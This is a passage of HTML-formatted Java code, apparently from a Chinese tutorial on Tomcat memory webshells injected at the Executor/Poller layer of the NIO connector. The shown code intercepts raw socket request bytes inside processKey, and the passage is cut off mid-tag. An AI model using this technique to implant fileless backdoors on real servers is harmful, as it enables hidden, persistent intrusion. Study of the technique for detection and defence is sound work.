style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">processKey</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">SelectionKey</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> sk</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> NioEndpoint</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">NioSocketWrapper</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> at</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">tachment</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// 推荐作为全局变量，做中间管道</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ByteBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> allocate </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ByteBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">allocate</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">8192</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> read </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> read </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> attachment</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">read</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">false</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> allocate</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IOException</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ByteBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> readBuffer </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ByteBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">allocate</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">read</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// 有多少数据就设置多少数据</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> readBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">put</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">allocate</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">array</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(),</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span 